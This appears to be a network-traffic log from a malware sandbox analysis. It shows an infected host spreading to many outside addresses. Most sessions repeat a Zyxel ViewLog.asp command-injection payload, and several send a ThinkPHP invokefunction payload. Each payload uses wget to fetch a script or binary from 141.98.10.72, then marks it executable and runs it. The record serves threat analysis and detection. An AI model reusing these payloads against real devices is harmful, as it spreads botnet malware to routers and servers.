Feb 14, 2024 09:31:14.390201092 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1036	192.168.2.15	58630	94.121.73.134	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:14.390599966 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1037	192.168.2.15	56800	31.133.206.20	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:14.392656088 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:14.646519899 CET	412	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 08:31:14 GMT Server: Apache/2.4.43 (Win64) Content-Length: 196 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1038	192.168.2.15	46702	94.123.34.123	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:14.398706913 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1039	192.168.2.15	33922	94.46.181.155	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:14.567939043 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:14.780554056 CET	1286	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:31:14 GMT Server: Apache Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {

Session ID	Source IP	Source Port	Destination IP	Destination Port
1040	192.168.2.15	44842	95.86.110.245	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:14.589430094 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1041	192.168.2.15	40290	94.26.12.84	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:14.611027956 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:15.767026901 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:17.110977888 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:19.959001064 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:25.334949017 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:36.086689949 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:59.125998020 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1042	192.168.2.15	55696	85.31.112.128	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:14.614785910 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1043	192.168.2.15	35838	94.122.29.5	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:14.636992931 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1044	192.168.2.15	45936	94.123.87.100	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:14.639802933 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1045	192.168.2.15	56520	112.74.127.163	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:14.865359068 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:15.223227978 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:31:15 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1046	192.168.2.15	57934	31.44.132.190	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:15.158564091 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1047	192.168.2.15	36690	94.123.49.214	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:15.158641100 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1048	192.168.2.15	43680	31.200.92.3	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:15.158694029 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1049	192.168.2.15	35128	94.187.99.245	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:15.158735037 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1050	192.168.2.15	59908	88.212.8.12	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:16.432631969 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:17.108361959 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:17.329647064 CET	516	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Wed, 14 Feb 2024 08:31:16 GMT Server: lighttpd/1.4.45 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1051	192.168.2.15	49512	88.212.252.120	80

Timestamp	Bytes transferred	Direction	Data
